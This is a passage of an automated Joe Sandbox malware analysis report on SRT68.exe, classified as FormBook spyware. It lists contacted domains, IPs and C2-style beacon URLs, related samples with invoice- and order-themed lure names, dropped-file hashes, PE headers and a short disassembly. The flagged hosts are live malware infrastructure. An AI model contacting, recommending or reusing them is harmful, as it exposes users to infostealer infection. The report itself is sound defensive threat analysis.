                                                            https://i7.ru/domains/#domregodbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://i7.ru/domains/odbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.ecosia.org/newtab/odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ac.ecosia.org/autocomplete?q=odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://proxyspot.comodbcconf.exe, 00000004.00000002.3836668787.0000000006646000.00000004.10000000.00040000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.amayavp.xyz/pxvi/?dpy4vDKP=yLx6IXsyZhSq7U6uqCPnr6MEodbcconf.exe, 00000004.00000002.3838981158.0000000007C50000.00000004.00000800.00020000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000002.3835499226.00000000042DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=odbcconf.exe, 00000004.00000003.1689442718.0000000007F2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://job.i7.ruVdxisCThGA.exe, 00000006.00000002.3835499226.0000000003FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    13.248.169.48
                                                                    www.remedies.proUnited States
                                                                    16509AMAZON-02USfalse
                                                                    209.74.77.107
                                                                    www.liveplah.liveUnited States
                                                                    31744MULTIBAND-NEWHOPEUStrue
                                                                    185.27.134.144
                                                                    www.amayavp.xyzUnited Kingdom
                                                                    34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                                    199.59.243.227
                                                                    www.acond-22-mvr.clickUnited States
                                                                    395082BODIS-NJUSfalse
                                                                    84.32.84.32
                                                                    appsolucao.shopLithuania
                                                                    33922NTT-LT-ASLTtrue
                                                                    81.2.196.19
                                                                    bagatowcannabis.cloudCzech Republic
                                                                    24806INTERNET-CZKtis238403KtisCZtrue
                                                                    154.23.184.207
                                                                    d48dk.topUnited States
                                                                    174COGENT-174UStrue
                                                                    85.159.66.93
                                                                    natroredirect.natrocdn.comTurkey
                                                                    34619CIZGITRfalse
                                                                    91.226.30.3
                                                                    www.vpnto.netRussian Federation
                                                                    56601I7-ASRUtrue
                                                                    195.110.124.133
                                                                    officinadelpasso.shopItaly
                                                                    39729REGISTER-ASITtrue
                                                                    154.88.22.105
                                                                    www.cg19g5.proSeychelles
                                                                    40065CNSERVERSUStrue
                                                                    103.249.106.91
                                                                    www.8600228.xyzChina
                                                                    137443ANCHGLOBAL-AS-APAnchnetAsiaLimitedHKtrue
                                                                    194.58.112.174
                                                                    www.fantastica.digitalRussian Federation
                                                                    197695AS-REGRUfalse
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1568958
                                                                    Start date and time:2024-12-05 09:42:07 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 10m 15s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:10
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:2
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:SRT68.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@16/13
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 90%
                                                                    • Number of executed functions: 48
                                                                    • Number of non-executed functions: 278
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    TimeTypeDescription
                                                                    03:43:47API Interceptor11853066x Sleep call for process: odbcconf.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    13.248.169.48ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • www.remedies.pro/4azw/
                                                                    Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                                                                    Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                    • www.smartgov.shop/1cwp/
                                                                    SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                    • www.egyshare.xyz/440l/
                                                                    attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                    • www.aktmarket.xyz/wb7v/
                                                                    YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tals.xyz/k1td/
                                                                    Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                    • www.optimismbank.xyz/98j3/
                                                                    lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                    • www.avalanchefi.xyz/ctta/
                                                                    BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                    • www.tals.xyz/k1td/
                                                                    PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                    • www.heliopsis.xyz/69zn/
                                                                    209.74.77.107UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                    • www.gadgetre.info/8q8w/
                                                                    PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                    • www.learnwithus.site/alu5/
                                                                    Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                    • www.learnwithus.site/alu5/
                                                                    SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                    • www.happyjam.life/4ii9/
                                                                    quotation.exeGet hashmaliciousFormBookBrowse
                                                                    • www.gadgetre.info/8q8w/
                                                                    Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.beyondfitness.live/fbpt/
                                                                    specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.gadgetre.info/8q8w/
                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • www.learnwithus.site/alu5/
                                                                    ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • www.gadgetre.info/8q8w/
                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • www.learnwithus.site/alu5/
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    www.avalanchefi.xyzlKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    www.remedies.proek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                    • 13.248.169.48
                                                                    www.cg19g5.proZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 154.88.22.105
                                                                    natroredirect.natrocdn.comek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    New Order.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 85.159.66.93
                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                    • 85.159.66.93
                                                                    www.amayavp.xyzPO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 185.27.134.144
                                                                    purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    MULTIBAND-NEWHOPEUSUPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.109
                                                                    PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                    • 209.74.77.109
                                                                    Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.42
                                                                    quotation.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.109
                                                                    WILDCARD-ASWildcardUKLimitedGBUPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.206
                                                                    PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    quotation.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.206
                                                                    YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.206
                                                                    Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.206
                                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                                    • 82.163.179.123
                                                                    BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.206
                                                                    specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                    • 185.27.134.206
                                                                    OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                    • 185.27.134.144
                                                                    AMAZON-02UShttps://click.pstmrk.it/3s/bmxn8t84vg.gherapilta.shop%2F/ySDk/28y5AQ/AQ/e82f1f59-f734-42be-affb-895d81855fb4/1/pD2JDTOBnbGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                    • 54.155.27.215
                                                                    sshd.elfGet hashmaliciousUnknownBrowse
                                                                    • 54.171.230.55
                                                                    SBO Catch up call pf.msgGet hashmaliciousHTMLPhisherBrowse
                                                                    • 18.194.24.71
                                                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 3.78.69.82
                                                                    https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2&c=E,1,dm0BsgXKEvQ4zpCWn9a_2TfhSLR8cGZr1-6jweGjTe0este5fASkeQZVLyX1Cz6QCtMNdDqQcYMIspu_vSObo4Nb1k5TezzFhTJcItmtEfuL-cJkW8Q4C3U6rUA,&typo=1&ancr_add=1Get hashmaliciousUnknownBrowse
                                                                    • 13.213.221.104
                                                                    https://fujipharma.box.com/s/pezxwn32zbr37fbrrrqh18g3y8eulbk2Get hashmaliciousUnknownBrowse
                                                                    • 18.138.137.135
                                                                    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 54.171.230.55
                                                                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 3.126.185.238
                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 54.64.32.233
                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 35.179.143.200
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\odbcconf.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1209886597424439
                                                                    Encrypted:false
                                                                    SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                    MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                    SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                    SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                    SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SRT68.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287744
                                                                    Entropy (8bit):7.994606275803805
                                                                    Encrypted:true
                                                                    SSDEEP:6144:hGzvZhjxTBLlvsjB//xiPAmSATBz//yoMs2AZ0h4rZIW:hGzxhjHLNaHUAIBy5KZ+4dt
                                                                    MD5:401D073347F93ACDE6EDCF2B9CC334E2
                                                                    SHA1:BC7723D102FAF089540C561C11415F15D41D244C
                                                                    SHA-256:EBBFF0E93A8E6E68CB67576421F3EB490C874C95436A99F39DB633BE825F2595
                                                                    SHA-512:10AE3757E4DF6DDCA77CB026CD931732B59E317C040CC6926409FDE467679041A751988D0056E1328D97BA075DD4A8E6E6810713D98097CF4723D225DFEF83C5
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...5@Q3Z7D38..XQ.DXCFP2W.55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4.Q8DV\.^2.A...P....[Q;.(#W#*"+pQ6&[Z7qQ?.6FVh]6q|..c+?V2f88Iu3Z3D38HMYX.y8$.mR0..U$.)....X/.B...d#!.(....#6..Z'[.(S.Q8DXCFP2..55.P2Z../nH4XQ8DXC.P0VC4>CQa^3D38H4XQ8TMCFP"WH5EGQ3ZsD3(H4XS8D^CFP2WH53CQ3Z3D3880XQ:DXCFP2UHu.CQ#Z3T38H4HQ8TXCFP2WX55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8Dv7#(FWH5..U3Z#D38.0XQ(DXCFP2WH55CQ3Z.D3XH4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D3
                                                                    Process:C:\Users\user\Desktop\SRT68.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):287744
                                                                    Entropy (8bit):7.994606275803805
                                                                    Encrypted:true
                                                                    SSDEEP:6144:hGzvZhjxTBLlvsjB//xiPAmSATBz//yoMs2AZ0h4rZIW:hGzxhjHLNaHUAIBy5KZ+4dt
                                                                    MD5:401D073347F93ACDE6EDCF2B9CC334E2
                                                                    SHA1:BC7723D102FAF089540C561C11415F15D41D244C
                                                                    SHA-256:EBBFF0E93A8E6E68CB67576421F3EB490C874C95436A99F39DB633BE825F2595
                                                                    SHA-512:10AE3757E4DF6DDCA77CB026CD931732B59E317C040CC6926409FDE467679041A751988D0056E1328D97BA075DD4A8E6E6810713D98097CF4723D225DFEF83C5
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...5@Q3Z7D38..XQ.DXCFP2W.55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4.Q8DV\.^2.A...P....[Q;.(#W#*"+pQ6&[Z7qQ?.6FVh]6q|..c+?V2f88Iu3Z3D38HMYX.y8$.mR0..U$.)....X/.B...d#!.(....#6..Z'[.(S.Q8DXCFP2..55.P2Z../nH4XQ8DXC.P0VC4>CQa^3D38H4XQ8TMCFP"WH5EGQ3ZsD3(H4XS8D^CFP2WH53CQ3Z3D3880XQ:DXCFP2UHu.CQ#Z3T38H4HQ8TXCFP2WX55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8Dv7#(FWH5..U3Z#D38.0XQ(DXCFP2WH55CQ3Z.D3XH4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D38H4XQ8DXCFP2WH55CQ3Z3D3
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.19321537227738
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:SRT68.exe
                                                                    File size:1'211'392 bytes
                                                                    MD5:71829b1e3a8cc54976390920f8c9282b
                                                                    SHA1:60777574082f65fa3436acd404fcec9fe8dd4c80
                                                                    SHA256:feaa7b0c24315f2516cc912f47bf1dce6cef3f007ccf05f94b0214ecdf255b3d
                                                                    SHA512:cfa3d8ea0468fc5a8e56e1bf6dbb3469ea77ab3d08464d8ef3d1e4743f213c663a3bdfef487bd1f3db78c98604e3c0add2443d2ee056819395aa5b5a76903549
                                                                    SSDEEP:24576:Ou6J33O0c+JY5UZ+XC0kGso6FaUGqupjFh/5W9OM+GWY:Au0c++OCvkGs9FaUGFFh5W9OpY
                                                                    TLSH:1345CF2273DDC360CB669173BF6AB7016EBF3C614630B95B2F980D7DA950162162C7A3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                    Icon Hash:aaf3e3e3938382a0
                                                                    Entrypoint:0x427dcd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x674F97FD [Tue Dec 3 23:45:01 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                    Instruction
                                                                    call 00007F913CECB68Ah
                                                                    jmp 00007F913CEBE454h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    push edi
                                                                    push esi
                                                                    mov esi, dword ptr [esp+10h]
                                                                    mov ecx, dword ptr [esp+14h]
                                                                    mov edi, dword ptr [esp+0Ch]
                                                                    mov eax, ecx
                                                                    mov edx, ecx
                                                                    add eax, esi
                                                                    cmp edi, esi
                                                                    jbe 00007F913CEBE5DAh
                                                                    cmp edi, eax
                                                                    jc 00007F913CEBE93Eh
                                                                    bt dword ptr [004C31FCh], 01h
                                                                    jnc 00007F913CEBE5D9h
                                                                    rep movsb
                                                                    jmp 00007F913CEBE8ECh
                                                                    cmp ecx, 00000080h
                                                                    jc 00007F913CEBE7A4h
                                                                    mov eax, edi
                                                                    xor eax, esi
                                                                    test eax, 0000000Fh
                                                                    jne 00007F913CEBE5E0h
                                                                    bt dword ptr [004BE324h], 01h
                                                                    jc 00007F913CEBEAB0h
                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                    jnc 00007F913CEBE77Dh
                                                                    test edi, 00000003h
                                                                    jne 00007F913CEBE78Eh
                                                                    test esi, 00000003h
                                                                    jne 00007F913CEBE76Dh
                                                                    bt edi, 02h
                                                                    jnc 00007F913CEBE5DFh
                                                                    mov eax, dword ptr [esi]
                                                                    sub ecx, 04h
                                                                    lea esi, dword ptr [esi+04h]
                                                                    mov dword ptr [edi], eax
                                                                    lea edi, dword ptr [edi+04h]
                                                                    bt edi, 03h
                                                                    jnc 00007F913CEBE5E3h
                                                                    movq xmm1, qword ptr [esi]
                                                                    sub ecx, 08h
                                                                    lea esi, dword ptr [esi+08h]
                                                                    movq qword ptr [edi], xmm1
                                                                    lea edi, dword ptr [edi+08h]
                                                                    test esi, 00000007h
                                                                    je 00007F913CEBE635h
                                                                    bt esi, 03h
                                                                    jnc 00007F913CEBE688h
                                                                    Programming Language:
                                                                    • [ASM] VS2013 build 21005
                                                                    • [ C ] VS2013 build 21005
                                                                    • [C++] VS2013 build 21005
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    • [ASM] VS2013 UPD4 build 31101
                                                                    • [RES] VS2013 build 21005
                                                                    • [LNK] VS2013 UPD4 build 31101
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5f20c.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x711c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0xc70000x5f20c0x5f400a5f02612af664187f89b4795e4bc3b4dFalse0.930407746883202data7.901432595864158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
